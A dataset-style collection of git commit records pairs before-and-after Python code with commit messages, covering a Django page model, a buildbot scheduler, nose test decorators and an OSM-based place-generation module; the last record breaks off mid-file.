<commit_before>from django.db import models
class Page(models.Model):
def __str__(self):
return self.name
name = models.CharField(max_length=64, blank=False)
name.help_text='Internal name of page'
title = models.CharField(max_length=64, blank=True)
title.help_text='Page title to display in titlebar of browser/tab'
body = models.TextField(max_length=8192, blank=True)
body.help_text='Page contents'
head = models.TextField(max_length=1024, blank=True)
head.help_text='Custom HTML to go in the <head> of the page'
css = models.TextField(max_length=1024, blank=True)
css.help_text='Custom CSS styles for the page'
leftbar = models.TextField(max_length=1024, blank=True)
leftbar.help_text='Left sidebar contents (use panels)'
rightbar = models.TextField(max_length=1024, blank=True)
rightbar.help_text='Right sidebar contents (use panels)'
<commit_msg>Increase character limit for pages
Closes #70.<commit_after>from django.db import models
class Page(models.Model):
def __str__(self):
return self.name
name = models.CharField(max_length=64, blank=False)
name.help_text='Internal name of page'
title = models.CharField(max_length=64, blank=True)
title.help_text='Page title to display in titlebar of browser/tab'
body = models.TextField(max_length=16384, blank=True)
body.help_text='Page contents'
head = models.TextField(max_length=16384, blank=True)
head.help_text='Custom HTML to go in the <head> of the page'
css = models.TextField(max_length=16384, blank=True)
css.help_text='Custom CSS styles for the page'
leftbar = models.TextField(max_length=16384, blank=True)
leftbar.help_text='Left sidebar contents (use panels)'
rightbar = models.TextField(max_length=16384, blank=True)
rightbar.help_text='Right sidebar contents (use panels)'
|
42918ef774625643220c182ca0eb5601841db595
|
dvox/app.py
|
dvox/app.py
|
config = {
"CREATE_RETRIES": 5,
"CHUNK_LOCK_TIMEOUT_SECONDS": 10,
"WORKER_TIMEOUT_SECONDS": 15
}
|
config = {
"CREATE_RETRIES": 5,
"CHUNK_LOCK_TIMEOUT_SECONDS": 10,
"WORKER_TIMEOUT_SECONDS": 15,
"CHUNK_SIZE": 25,
"BLOCK_BYTE_SIZE": 8
}
|
Add controls for storage size
|
Add controls for storage size
|
Python
|
mit
|
numberoverzero/dvox
|
config = {
"CREATE_RETRIES": 5,
"CHUNK_LOCK_TIMEOUT_SECONDS": 10,
"WORKER_TIMEOUT_SECONDS": 15
}
Add controls for storage size
|
config = {
"CREATE_RETRIES": 5,
"CHUNK_LOCK_TIMEOUT_SECONDS": 10,
"WORKER_TIMEOUT_SECONDS": 15,
"CHUNK_SIZE": 25,
"BLOCK_BYTE_SIZE": 8
}
|
<commit_before>config = {
"CREATE_RETRIES": 5,
"CHUNK_LOCK_TIMEOUT_SECONDS": 10,
"WORKER_TIMEOUT_SECONDS": 15
}
<commit_msg>Add controls for storage size<commit_after>
|
config = {
"CREATE_RETRIES": 5,
"CHUNK_LOCK_TIMEOUT_SECONDS": 10,
"WORKER_TIMEOUT_SECONDS": 15,
"CHUNK_SIZE": 25,
"BLOCK_BYTE_SIZE": 8
}
|
config = {
"CREATE_RETRIES": 5,
"CHUNK_LOCK_TIMEOUT_SECONDS": 10,
"WORKER_TIMEOUT_SECONDS": 15
}
Add controls for storage sizeconfig = {
"CREATE_RETRIES": 5,
"CHUNK_LOCK_TIMEOUT_SECONDS": 10,
"WORKER_TIMEOUT_SECONDS": 15,
"CHUNK_SIZE": 25,
"BLOCK_BYTE_SIZE": 8
}
|
<commit_before>config = {
"CREATE_RETRIES": 5,
"CHUNK_LOCK_TIMEOUT_SECONDS": 10,
"WORKER_TIMEOUT_SECONDS": 15
}
<commit_msg>Add controls for storage size<commit_after>config = {
"CREATE_RETRIES": 5,
"CHUNK_LOCK_TIMEOUT_SECONDS": 10,
"WORKER_TIMEOUT_SECONDS": 15,
"CHUNK_SIZE": 25,
"BLOCK_BYTE_SIZE": 8
}
|
510063159145cd3fdc7bdd0c8b93dc46d98a88c8
|
obj_sys/models.py
|
obj_sys/models.py
|
# Create your models here.
from models_obj_rel import *
from models_ufs_obj import *
try:
# apps.py
from django.apps import AppConfig
try:
import tagging
tagging.register(UfsObj)
except ImportError:
pass
except ImportError:
try:
import tagging
tagging.register(UfsObj)
except ImportError:
pass
except ImportError:
pass
|
# Create your models here.
from models_obj_rel import *
from models_ufs_obj import *
try:
import tagging
tagging.register(UfsObj)
except ImportError:
pass
|
Remove not used app config.
|
Remove not used app config.
|
Python
|
bsd-3-clause
|
weijia/obj_sys,weijia/obj_sys
|
# Create your models here.
from models_obj_rel import *
from models_ufs_obj import *
try:
# apps.py
from django.apps import AppConfig
try:
import tagging
tagging.register(UfsObj)
except ImportError:
pass
except ImportError:
try:
import tagging
tagging.register(UfsObj)
except ImportError:
pass
except ImportError:
pass
Remove not used app config.
|
# Create your models here.
from models_obj_rel import *
from models_ufs_obj import *
try:
import tagging
tagging.register(UfsObj)
except ImportError:
pass
|
<commit_before># Create your models here.
from models_obj_rel import *
from models_ufs_obj import *
try:
# apps.py
from django.apps import AppConfig
try:
import tagging
tagging.register(UfsObj)
except ImportError:
pass
except ImportError:
try:
import tagging
tagging.register(UfsObj)
except ImportError:
pass
except ImportError:
pass
<commit_msg>Remove not used app config.<commit_after>
|
# Create your models here.
from models_obj_rel import *
from models_ufs_obj import *
try:
import tagging
tagging.register(UfsObj)
except ImportError:
pass
|
# Create your models here.
from models_obj_rel import *
from models_ufs_obj import *
try:
# apps.py
from django.apps import AppConfig
try:
import tagging
tagging.register(UfsObj)
except ImportError:
pass
except ImportError:
try:
import tagging
tagging.register(UfsObj)
except ImportError:
pass
except ImportError:
pass
Remove not used app config.# Create your models here.
from models_obj_rel import *
from models_ufs_obj import *
try:
import tagging
tagging.register(UfsObj)
except ImportError:
pass
|
<commit_before># Create your models here.
from models_obj_rel import *
from models_ufs_obj import *
try:
# apps.py
from django.apps import AppConfig
try:
import tagging
tagging.register(UfsObj)
except ImportError:
pass
except ImportError:
try:
import tagging
tagging.register(UfsObj)
except ImportError:
pass
except ImportError:
pass
<commit_msg>Remove not used app config.<commit_after># Create your models here.
from models_obj_rel import *
from models_ufs_obj import *
try:
import tagging
tagging.register(UfsObj)
except ImportError:
pass
|
33a9bd5cf465a56c2eb156dcbc0d4e61a0f590a4
|
osmABTS/places.py
|
osmABTS/places.py
|
"""
Places of interest generation
=============================
"""
|
"""
Places of interest generation
=============================
This module defines a class for places of interest and the functions for
generating the data structure for all of them from the OSM raw data.
Each place of interest will basically just carry the information about its
location in the **network** as the identity of the network node which is
nearest to its actual location. And additionally, a name can be given for it,
as well as a weight that can be used for the random allocation for the
travellers.
The places of interest will be bundled in a dictionary, with the name of the
category as the key and a list of the actual places as the value.
"""
class Place(object):
"""The places of interest for the travellers
Since the category is going to be stored one level upper as the dictionary
key, here just a few attributes are needed
.. py:attribute:: node
The node identity for the place of interest in the network
.. py::attribute:: name
The name of the place of interest
.. py::attribute:: weight
The weight for it during the place allocation. The probability of being
selected.
"""
__slots__ = [
'node',
'name',
'weight',
]
def __init__(self, node, name, weight):
"""Initializes the place instance"""
self.node = node
self.name = name
self.weight = weight
#
# Home generation
# ---------------
#
# The home generation is different from all the other places, since it is going
# to be based on the existance of residential road, rather than specific
# locations on the map.
#
# The generation code will iterate over all the nodes of the graph, find out
# the total length of residential road edges on it, and use that length as the
# weight. For nodes with no residential road, no people will live there.
#
def _gen_homes(net):
"""Generates a list of homes for a given network
:param net: The NetworkX graph for the simulation
:returns: A list of :py:class:`Place` instances for the homes
"""
homes = []
for node in net.nodes_iter():
weight = 0.0
for road in net[node].itervalues():
if road['highway'] == 'residential':
weight += road['length']
# 0.01 is an arbitrary delta to skip nodes with few residents
if weight > 0.01:
homes.append(
Place(node, 'home', weight)
)
return homes
#
# Some constance for place generation
# -----------------------------------
#
|
Implement place class and homes generation
|
Implement place class and homes generation
The Place class for places of interest has been implemented, as well as
the generation of homes, which is different from the generation of other
places of interest.
|
Python
|
mit
|
tschijnmo/osmABTS
|
"""
Places of interest generation
=============================
"""
Implement place class and homes generation
The Place class for places of interest has been implemented, as well as
the generation of homes, which is different from the generation of other
places of interest.
|
"""
Places of interest generation
=============================
This module defines a class for places of interest and the functions for
generating the data structure for all of them from the OSM raw data.
Each place of interest will basically just carry the information about its
location in the **network** as the identity of the network node which is
nearest to its actual location. And additionally, a name can be given for it,
as well as a weight that can be used for the random allocation for the
travellers.
The places of interest will be bundled in a dictionary, with the name of the
category as the key and a list of the actual places as the value.
"""
class Place(object):
"""The places of interest for the travellers
Since the category is going to be stored one level upper as the dictionary
key, here just a few attributes are needed
.. py:attribute:: node
The node identity for the place of interest in the network
.. py::attribute:: name
The name of the place of interest
.. py::attribute:: weight
The weight for it during the place allocation. The probability of being
selected.
"""
__slots__ = [
'node',
'name',
'weight',
]
def __init__(self, node, name, weight):
"""Initializes the place instance"""
self.node = node
self.name = name
self.weight = weight
#
# Home generation
# ---------------
#
# The home generation is different from all the other places, since it is going
# to be based on the existance of residential road, rather than specific
# locations on the map.
#
# The generation code will iterate over all the nodes of the graph, find out
# the total length of residential road edges on it, and use that length as the
# weight. For nodes with no residential road, no people will live there.
#
def _gen_homes(net):
"""Generates a list of homes for a given network
:param net: The NetworkX graph for the simulation
:returns: A list of :py:class:`Place` instances for the homes
"""
homes = []
for node in net.nodes_iter():
weight = 0.0
for road in net[node].itervalues():
if road['highway'] == 'residential':
weight += road['length']
# 0.01 is an arbitrary delta to skip nodes with few residents
if weight > 0.01:
homes.append(
Place(node, 'home', weight)
)
return homes
#
# Some constance for place generation
# -----------------------------------
#
|
<commit_before>"""
Places of interest generation
=============================
"""
<commit_msg>Implement place class and homes generation
The Place class for places of interest has been implemented, as well as
the generation of homes, which is different from the generation of other
places of interest.<commit_after>
|
"""
Places of interest generation
=============================
This module defines a class for places of interest and the functions for
generating the data structure for all of them from the OSM raw data.
Each place of interest will basically just carry the information about its
location in the **network** as the identity of the network node which is
nearest to its actual location. And additionally, a name can be given for it,
as well as a weight that can be used for the random allocation for the
travellers.
The places of interest will be bundled in a dictionary, with the name of the
category as the key and a list of the actual places as the value.
"""
class Place(object):
"""The places of interest for the travellers
Since the category is going to be stored one level upper as the dictionary
key, here just a few attributes are needed
.. py:attribute:: node
The node identity for the place of interest in the network
.. py::attribute:: name
The name of the place of interest
.. py::attribute:: weight
The weight for it during the place allocation. The probability of being
selected.
"""
__slots__ = [
'node',
'name',
'weight',
]
def __init__(self, node, name, weight):
"""Initializes the place instance"""
self.node = node
self.name = name
self.weight = weight
#
# Home generation
# ---------------
#
# The home generation is different from all the other places, since it is going
# to be based on the existance of residential road, rather than specific
# locations on the map.
#
# The generation code will iterate over all the nodes of the graph, find out
# the total length of residential road edges on it, and use that length as the
# weight. For nodes with no residential road, no people will live there.
#
def _gen_homes(net):
"""Generates a list of homes for a given network
:param net: The NetworkX graph for the simulation
:returns: A list of :py:class:`Place` instances for the homes
"""
homes = []
for node in net.nodes_iter():
weight = 0.0
for road in net[node].itervalues():
if road['highway'] == 'residential':
weight += road['length']
# 0.01 is an arbitrary delta to skip nodes with few residents
if weight > 0.01:
homes.append(
Place(node, 'home', weight)
)
return homes
#
# Some constance for place generation
# -----------------------------------
#
|
"""
Places of interest generation
=============================
"""
Implement place class and homes generation
The Place class for places of interest has been implemented, as well as
the generation of homes, which is different from the generation of other
places of interest."""
Places of interest generation
=============================
This module defines a class for places of interest and the functions for
generating the data structure for all of them from the OSM raw data.
Each place of interest will basically just carry the information about its
location in the **network** as the identity of the network node which is
nearest to its actual location. And additionally, a name can be given for it,
as well as a weight that can be used for the random allocation for the
travellers.
The places of interest will be bundled in a dictionary, with the name of the
category as the key and a list of the actual places as the value.
"""
class Place(object):
"""The places of interest for the travellers
Since the category is going to be stored one level upper as the dictionary
key, here just a few attributes are needed
.. py:attribute:: node
The node identity for the place of interest in the network
.. py::attribute:: name
The name of the place of interest
.. py::attribute:: weight
The weight for it during the place allocation. The probability of being
selected.
"""
__slots__ = [
'node',
'name',
'weight',
]
def __init__(self, node, name, weight):
"""Initializes the place instance"""
self.node = node
self.name = name
self.weight = weight
#
# Home generation
# ---------------
#
# The home generation is different from all the other places, since it is going
# to be based on the existance of residential road, rather than specific
# locations on the map.
#
# The generation code will iterate over all the nodes of the graph, find out
# the total length of residential road edges on it, and use that length as the
# weight. For nodes with no residential road, no people will live there.
#
def _gen_homes(net):
"""Generates a list of homes for a given network
:param net: The NetworkX graph for the simulation
:returns: A list of :py:class:`Place` instances for the homes
"""
homes = []
for node in net.nodes_iter():
weight = 0.0
for road in net[node].itervalues():
if road['highway'] == 'residential':
weight += road['length']
# 0.01 is an arbitrary delta to skip nodes with few residents
if weight > 0.01:
homes.append(
Place(node, 'home', weight)
)
return homes
#
# Some constance for place generation
# -----------------------------------
#
|
<commit_before>"""
Places of interest generation
=============================
"""
<commit_msg>Implement place class and homes generation
The Place class for places of interest has been implemented, as well as
the generation of homes, which is different from the generation of other
places of interest.<commit_after>"""
Places of interest generation
=============================
This module defines a class for places of interest and the functions for
generating the data structure for all of them from the OSM raw data.
Each place of interest will basically just carry the information about its
location in the **network** as the identity of the network node which is
nearest to its actual location. And additionally, a name can be given for it,
as well as a weight that can be used for the random allocation for the
travellers.
The places of interest will be bundled in a dictionary, with the name of the
category as the key and a list of the actual places as the value.
"""
class Place(object):
"""The places of interest for the travellers
Since the category is going to be stored one level upper as the dictionary
key, here just a few attributes are needed
.. py:attribute:: node
The node identity for the place of interest in the network
.. py::attribute:: name
The name of the place of interest
.. py::attribute:: weight
The weight for it during the place allocation. The probability of being
selected.
"""
__slots__ = [
'node',
'name',
'weight',
]
def __init__(self, node, name, weight):
"""Initializes the place instance"""
self.node = node
self.name = name
self.weight = weight
#
# Home generation
# ---------------
#
# The home generation is different from all the other places, since it is going
# to be based on the existance of residential road, rather than specific
# locations on the map.
#
# The generation code will iterate over all the nodes of the graph, find out
# the total length of residential road edges on it, and use that length as the
# weight. For nodes with no residential road, no people will live there.
#
def _gen_homes(net):
"""Generates a list of homes for a given network
:param net: The NetworkX graph for the simulation
:returns: A list of :py:class:`Place` instances for the homes
"""
homes = []
for node in net.nodes_iter():
weight = 0.0
for road in net[node].itervalues():
if road['highway'] == 'residential':
weight += road['length']
# 0.01 is an arbitrary delta to skip nodes with few residents
if weight > 0.01:
homes.append(
Place(node, 'home', weight)
)
return homes
#
# Some constance for place generation
# -----------------------------------
#
|
306cf5987c90d54d72037c19dd02f07be37cbb6f
|
make_mozilla/base/tests/decorators.py
|
make_mozilla/base/tests/decorators.py
|
from functools import wraps
from nose.plugins.attrib import attr
from nose.plugins.skip import SkipTest
__all__ = ['wip']
def fail(message):
raise AssertionError(message)
def wip(f):
@wraps(f)
def run_test(*args, **kwargs):
try:
f(*args, **kwargs)
except Exception as e:
raise SkipTest("WIP test failed: " + str(e))
fail("test passed but marked as work in progress")
return attr('wip')(run_test)
|
from functools import wraps
from nose.plugins.attrib import attr
from nose.plugins.skip import SkipTest
import os
__all__ = ['wip']
def fail(message):
raise AssertionError(message)
def wip(f):
@wraps(f)
def run_test(*args, **kwargs):
try:
f(*args, **kwargs)
except Exception as e:
raise SkipTest("WIP test failed: " + str(e))
fail("test passed but marked as work in progress")
return attr('wip')(run_test)
def integration(f):
@wraps(f)
def run_test(*args, **kwargs):
integration_run = (os.getenv('INTEGRATION', None) is not None)
if integration_run:
f(*args, **kwargs)
else:
raise SkipTest("Skipping integration test")
return attr('integration')(run_test)
|
Add integration test decorator to prevent certain tests running unless we really want them to.
|
Add integration test decorator to prevent certain tests running unless we really want them to.
|
Python
|
bsd-3-clause
|
mozilla/make.mozilla.org,mozilla/make.mozilla.org,mozilla/make.mozilla.org,mozilla/make.mozilla.org
|
from functools import wraps
from nose.plugins.attrib import attr
from nose.plugins.skip import SkipTest
__all__ = ['wip']
def fail(message):
raise AssertionError(message)
def wip(f):
@wraps(f)
def run_test(*args, **kwargs):
try:
f(*args, **kwargs)
except Exception as e:
raise SkipTest("WIP test failed: " + str(e))
fail("test passed but marked as work in progress")
return attr('wip')(run_test)
Add integration test decorator to prevent certain tests running unless we really want them to.
|
from functools import wraps
from nose.plugins.attrib import attr
from nose.plugins.skip import SkipTest
import os
__all__ = ['wip']
def fail(message):
raise AssertionError(message)
def wip(f):
@wraps(f)
def run_test(*args, **kwargs):
try:
f(*args, **kwargs)
except Exception as e:
raise SkipTest("WIP test failed: " + str(e))
fail("test passed but marked as work in progress")
return attr('wip')(run_test)
def integration(f):
@wraps(f)
def run_test(*args, **kwargs):
integration_run = (os.getenv('INTEGRATION', None) is not None)
if integration_run:
f(*args, **kwargs)
else:
raise SkipTest("Skipping integration test")
return attr('integration')(run_test)
|
<commit_before>from functools import wraps
from nose.plugins.attrib import attr
from nose.plugins.skip import SkipTest
__all__ = ['wip']
def fail(message):
raise AssertionError(message)
def wip(f):
@wraps(f)
def run_test(*args, **kwargs):
try:
f(*args, **kwargs)
except Exception as e:
raise SkipTest("WIP test failed: " + str(e))
fail("test passed but marked as work in progress")
return attr('wip')(run_test)
<commit_msg>Add integration test decorator to prevent certain tests running unless we really want them to.<commit_after>
|
from functools import wraps
from nose.plugins.attrib import attr
from nose.plugins.skip import SkipTest
import os
__all__ = ['wip']
def fail(message):
raise AssertionError(message)
def wip(f):
@wraps(f)
def run_test(*args, **kwargs):
try:
f(*args, **kwargs)
except Exception as e:
raise SkipTest("WIP test failed: " + str(e))
fail("test passed but marked as work in progress")
return attr('wip')(run_test)
def integration(f):
@wraps(f)
def run_test(*args, **kwargs):
integration_run = (os.getenv('INTEGRATION', None) is not None)
if integration_run:
f(*args, **kwargs)
else:
raise SkipTest("Skipping integration test")
return attr('integration')(run_test)
|
from functools import wraps
from nose.plugins.attrib import attr
from nose.plugins.skip import SkipTest
__all__ = ['wip']
def fail(message):
raise AssertionError(message)
def wip(f):
@wraps(f)
def run_test(*args, **kwargs):
try:
f(*args, **kwargs)
except Exception as e:
raise SkipTest("WIP test failed: " + str(e))
fail("test passed but marked as work in progress")
return attr('wip')(run_test)
Add integration test decorator to prevent certain tests running unless we really want them to.from functools import wraps
from nose.plugins.attrib import attr
from nose.plugins.skip import SkipTest
import os
__all__ = ['wip']
def fail(message):
raise AssertionError(message)
def wip(f):
@wraps(f)
def run_test(*args, **kwargs):
try:
f(*args, **kwargs)
except Exception as e:
raise SkipTest("WIP test failed: " + str(e))
fail("test passed but marked as work in progress")
return attr('wip')(run_test)
def integration(f):
@wraps(f)
def run_test(*args, **kwargs):
integration_run = (os.getenv('INTEGRATION', None) is not None)
if integration_run:
f(*args, **kwargs)
else:
raise SkipTest("Skipping integration test")
return attr('integration')(run_test)
|
<commit_before>from functools import wraps
from nose.plugins.attrib import attr
from nose.plugins.skip import SkipTest
__all__ = ['wip']
def fail(message):
raise AssertionError(message)
def wip(f):
@wraps(f)
def run_test(*args, **kwargs):
try:
f(*args, **kwargs)
except Exception as e:
raise SkipTest("WIP test failed: " + str(e))
fail("test passed but marked as work in progress")
return attr('wip')(run_test)
<commit_msg>Add integration test decorator to prevent certain tests running unless we really want them to.<commit_after>from functools import wraps
from nose.plugins.attrib import attr
from nose.plugins.skip import SkipTest
import os
__all__ = ['wip']
def fail(message):
raise AssertionError(message)
def wip(f):
@wraps(f)
def run_test(*args, **kwargs):
try:
f(*args, **kwargs)
except Exception as e:
raise SkipTest("WIP test failed: " + str(e))
fail("test passed but marked as work in progress")
return attr('wip')(run_test)
def integration(f):
@wraps(f)
def run_test(*args, **kwargs):
integration_run = (os.getenv('INTEGRATION', None) is not None)
if integration_run:
f(*args, **kwargs)
else:
raise SkipTest("Skipping integration test")
return attr('integration')(run_test)
|
aeae640c34b7f68870304fb2a6a163d852440b7a
|
test/buildbot/buildbot_config/master/schedulers.py
|
test/buildbot/buildbot_config/master/schedulers.py
|
"""
This module contains the logic which returns the set of
schedulers to use for the build master.
"""
def get_schedulers():
return []
|
"""
This module contains the logic which returns the set of
schedulers to use for the build master.
"""
from buildbot.changes.filter import ChangeFilter
from buildbot.schedulers.basic import SingleBranchScheduler
def get_schedulers():
full = SingleBranchScheduler(name="full",
change_filter=ChangeFilter(branch="master"),
treeStableTimer=60,
builderNames=["vagrant-master"])
return [full]
|
Add a scheduler for the master branch to run
|
Buildbot: Add a scheduler for the master branch to run
|
Python
|
mit
|
mkuzmin/vagrant,zsjohny/vagrant,ferventcoder/vagrant,sni/vagrant,patrys/vagrant,ArloL/vagrant,tomfanning/vagrant,channui/vagrant,wangfakang/vagrant,muhanadra/vagrant,jkburges/vagrant,rivy/vagrant,muhanadra/vagrant,krig/vagrant,Ninir/vagrant,tbarrongh/vagrant,johntron/vagrant,petems/vagrant,signed8bit/vagrant,carlosefr/vagrant,Chhunlong/vagrant,Ninir/vagrant,loren-osborn/vagrant,fnewberg/vagrant,Endika/vagrant,jtopper/vagrant,kamigerami/vagrant,tjanez/vagrant,mitchellh/vagrant,darkn3rd/vagrant,tjanez/vagrant,tjanez/vagrant,Chhunlong/vagrant,bheuvel/vagrant,sax/vagrant,webcoyote/vagrant,philwrenn/vagrant,gajdaw/vagrant,tschortsch/vagrant,genome21/vagrant,tjanez/vagrant,fnewberg/vagrant,rivy/vagrant,krig/vagrant,vamegh/vagrant,tomfanning/vagrant,sferik/vagrant,kamigerami/vagrant,pwnall/vagrant,tknerr/vagrant,darkn3rd/vagrant,Sgoettschkes/vagrant,PatOShea/vagrant,Avira/vagrant,MiLk/vagrant,h4ck3rm1k3/vagrant,cgvarela/vagrant,gitebra/vagrant,apertoso/vagrant,jmanero/vagrant,darkn3rd/vagrant,p0deje/vagrant,chrisvire/vagrant,philoserf/vagrant,sni/vagrant,aaam/vagrant,jean/vagrant,jkburges/vagrant,juiceinc/vagrant,taliesins/vagrant,PatrickLang/vagrant,zsjohny/vagrant,h4ck3rm1k3/vagrant,janek-warchol/vagrant,gitebra/vagrant,miguel250/vagrant,apertoso/vagrant,teotihuacanada/vagrant,Chhed13/vagrant,p0deje/vagrant,jkburges/vagrant,zsjohny/vagrant,sideci-sample/sideci-sample-vagrant,fnewberg/vagrant,doy/vagrant,Avira/vagrant,bshurts/vagrant,msabramo/vagrant,taliesins/vagrant,doy/vagrant,vamegh/vagrant,Chhunlong/vagrant,krig/vagrant,dustymabe/vagrant,kalabiyau/vagrant,ArloL/vagrant,aaam/vagrant,jmanero/vagrant,crashlytics/vagrant,gajdaw/vagrant,legal90/vagrant,signed8bit/vagrant,justincampbell/vagrant,miguel250/vagrant,denisbr/vagrant,nickryand/vagrant,rivy/vagrant,mkuzmin/vagrant,denisbr/vagrant,sax/vagrant,Endika/vagrant,evverx/vagrant,Sgoettschkes/vagrant,mkuzmin/vagrant,senglin/vagrant,gpkfr/vagrant,lonniev/vagrant,PatOShea/vagrant,shtouff/vagrant,mephaust/vagrant,kalabiyau/vagrant,tomfanning/vagrant,juiceinc/vagrant,invernizzi-at-google/vagrant,otagi/vagrant,chrisvire/vagrant,bshurts/vagrant,wangfakang/vagrant,crashlytics/vagrant,bmhatfield/vagrant,muhanadra/vagrant,samphippen/vagrant,miguel250/vagrant,dharmab/vagrant,jean/vagrant,wkolean/vagrant,sferik/vagrant,dharmab/vagrant,benh57/vagrant,carlosefr/vagrant,philwrenn/vagrant,rivy/vagrant,bryson/vagrant,loren-osborn/vagrant,samphippen/vagrant,cgvarela/vagrant,nickryand/vagrant,johntron/vagrant,sax/vagrant,lonniev/vagrant,otagi/vagrant,tschortsch/vagrant,modulexcite/vagrant,ianmiell/vagrant,shtouff/vagrant,dustymabe/vagrant,benizi/vagrant,philoserf/vagrant,mwrock/vagrant,Avira/vagrant,benizi/vagrant,aaam/vagrant,tschortsch/vagrant,iNecas/vagrant,vamegh/vagrant,dustymabe/vagrant,ArloL/vagrant,aneeshusa/vagrant,denisbr/vagrant,kamigerami/vagrant,gpkfr/vagrant,patrys/vagrant,tbriggs-curse/vagrant,msabramo/vagrant,Endika/vagrant,benh57/vagrant,nickryand/vagrant,krig/vagrant,loren-osborn/vagrant,BlakeMesdag/vagrant,TheBigBear/vagrant,kalabiyau/vagrant,benh57/vagrant,mwarren/vagrant,mpoeter/vagrant,jhoblitt/vagrant,glensc/vagrant,gajdaw/vagrant,jtopper/vagrant,PatOShea/vagrant,lonniev/vagrant,petems/vagrant,obnoxxx/vagrant,jfchevrette/vagrant,bheuvel/vagrant,gitebra/vagrant,chrisroberts/vagrant,bheuvel/vagrant,jmanero/vagrant,Chhunlong/vagrant,juiceinc/vagrant,jtopper/vagrant,chrisvire/vagrant,dharmab/vagrant,lukebakken/vagrant,msabramo/vagrant,kalabiyau/vagrant,gpkfr/vagrant,muhanadra/vagrant,doy/vagrant,myrjola/vagrant,wangfakang/vagrant,juiceinc/vagrant,evverx/vagrant,genome21/vagrant,jhoblitt/vagrant,mwrock/vagrant,theist/vagrant,fnewberg/vagrant,justincampbell/vagrant,wangfakang/vagrant,tbarrongh/vagrant,bryson/vagrant,jfchevrette/vagrant,chrisroberts/vagrant,jfchevrette/vagrant,wkolean/vagrant,janek-warchol/vagrant,philoserf/vagrant,invernizzi-at-google/vagrant,mephaust/vagrant,senglin/vagrant,chrisvire/vagrant,stephancom/vagrant,petems/vagrant,jhoblitt/vagrant,shtouff/vagrant,ferventcoder/vagrant,legal90/vagrant,denisbr/vagrant,obnoxxx/vagrant,benizi/vagrant,janek-warchol/vagrant,loren-osborn/vagrant,PatrickLang/vagrant,samphippen/vagrant,lukebakken/vagrant,aneeshusa/vagrant,kamazee/vagrant,webcoyote/vagrant,gbarberi/vagrant,mpoeter/vagrant,marxarelli/vagrant,johntron/vagrant,genome21/vagrant,tknerr/vagrant,myrjola/vagrant,mwarren/vagrant,modulexcite/vagrant,channui/vagrant,MiLk/vagrant,zsjohny/vagrant,signed8bit/vagrant,blueyed/vagrant,stephancom/vagrant,jberends/vagrant,modulexcite/vagrant,philoserf/vagrant,marxarelli/vagrant,carlosefr/vagrant,channui/vagrant,myrjola/vagrant,vamegh/vagrant,jberends/vagrant,kamazee/vagrant,marxarelli/vagrant,bmhatfield/vagrant,ianmiell/vagrant,mephaust/vagrant,mitchellh/vagrant,mpoeter/vagrant,gbarberi/vagrant,benizi/vagrant,mpoeter/vagrant,apertoso/vagrant,genome21/vagrant,philwrenn/vagrant,pwnall/vagrant,chrisroberts/vagrant,webcoyote/vagrant,bryson/vagrant,webcoyote/vagrant,jkburges/vagrant,sideci-sample/sideci-sample-vagrant,ianmiell/vagrant,ferventcoder/vagrant,teotihuacanada/vagrant,gpkfr/vagrant,jean/vagrant,theist/vagrant,crashlytics/vagrant,pwnall/vagrant,bshurts/vagrant,sni/vagrant,mwrock/vagrant,marxarelli/vagrant,modulexcite/vagrant,otagi/vagrant,dhoer/vagrant,lukebakken/vagrant,crashlytics/vagrant,PatrickLang/vagrant,Chhed13/vagrant,tbriggs-curse/vagrant,jfchevrette/vagrant,teotihuacanada/vagrant,TheBigBear/vagrant,jberends/vagrant,Avira/vagrant,jean/vagrant,PatrickLang/vagrant,ianmiell/vagrant,glensc/vagrant,senglin/vagrant,legal90/vagrant,sferik/vagrant,petems/vagrant,philwrenn/vagrant,bdwyertech/vagrant,kamigerami/vagrant,msabramo/vagrant,dhoer/vagrant,jmanero/vagrant,legal90/vagrant,stephancom/vagrant,tknerr/vagrant,taliesins/vagrant,senglin/vagrant,sax/vagrant,patrys/vagrant,invernizzi-at-google/vagrant,dharmab/vagrant,mitchellh/vagrant,clinstid/vagrant,lonniev/vagrant,p0deje/vagrant,wkolean/vagrant,taliesins/vagrant,theist/vagrant,miguel250/vagrant,tbarrongh/vagrant,bdwyertech/vagrant,bryson/vagrant,nickryand/vagrant,blueyed/vagrant,mkuzmin/vagrant,tbriggs-curse/vagrant,dustymabe/vagrant,sideci-sample/sideci-sample-vagrant,tomfanning/vagrant,justincampbell/vagrant,iNecas/vagrant,patrys/vagrant,dhoer/vagrant,johntron/vagrant,TheBigBear/vagrant,MiLk/vagrant,apertoso/vagrant,samphippen/vagrant,jtopper/vagrant,justincampbell/vagrant,pwnall/vagrant,Sgoettschkes/vagrant,invernizzi-at-google/vagrant,dhoer/vagrant,h4ck3rm1k3/vagrant,clinstid/vagrant,doy/vagrant,carlosefr/vagrant,aaam/vagrant,cgvarela/vagrant,mephaust/vagrant,cgvarela/vagrant,shtouff/vagrant,chrisroberts/vagrant,janek-warchol/vagrant,otagi/vagrant,bdwyertech/vagrant,TheBigBear/vagrant,aneeshusa/vagrant,Chhed13/vagrant,jhoblitt/vagrant,mwarren/vagrant,mitchellh/vagrant,bdwyertech/vagrant,obnoxxx/vagrant,tschortsch/vagrant,Chhed13/vagrant,evverx/vagrant,Ninir/vagrant,mwarren/vagrant,BlakeMesdag/vagrant,Sgoettschkes/vagrant,aneeshusa/vagrant,jberends/vagrant,h4ck3rm1k3/vagrant,BlakeMesdag/vagrant,clinstid/vagrant,tbarrongh/vagrant,stephancom/vagrant,PatOShea/vagrant,sni/vagrant,kamazee/vagrant,blueyed/vagrant,theist/vagrant,kamazee/vagrant,signed8bit/vagrant,bheuvel/vagrant,wkolean/vagrant,iNecas/vagrant,gbarberi/vagrant,myrjola/vagrant,benh57/vagrant,Endika/vagrant,lukebakken/vagrant,gitebra/vagrant,tknerr/vagrant,blueyed/vagrant,teotihuacanada/vagrant,ArloL/vagrant,ferventcoder/vagrant,darkn3rd/vagrant,bmhatfield/vagrant,tbriggs-curse/vagrant,gbarberi/vagrant,bshurts/vagrant,mwrock/vagrant
|
"""
This module contains the logic which returns the set of
schedulers to use for the build master.
"""
def get_schedulers():
return []
Buildbot: Add a scheduler for the master branch to run
|
"""
This module contains the logic which returns the set of
schedulers to use for the build master.
"""
from buildbot.changes.filter import ChangeFilter
from buildbot.schedulers.basic import SingleBranchScheduler
def get_schedulers():
full = SingleBranchScheduler(name="full",
change_filter=ChangeFilter(branch="master"),
treeStableTimer=60,
builderNames=["vagrant-master"])
return [full]
|
<commit_before>"""
This module contains the logic which returns the set of
schedulers to use for the build master.
"""
def get_schedulers():
return []
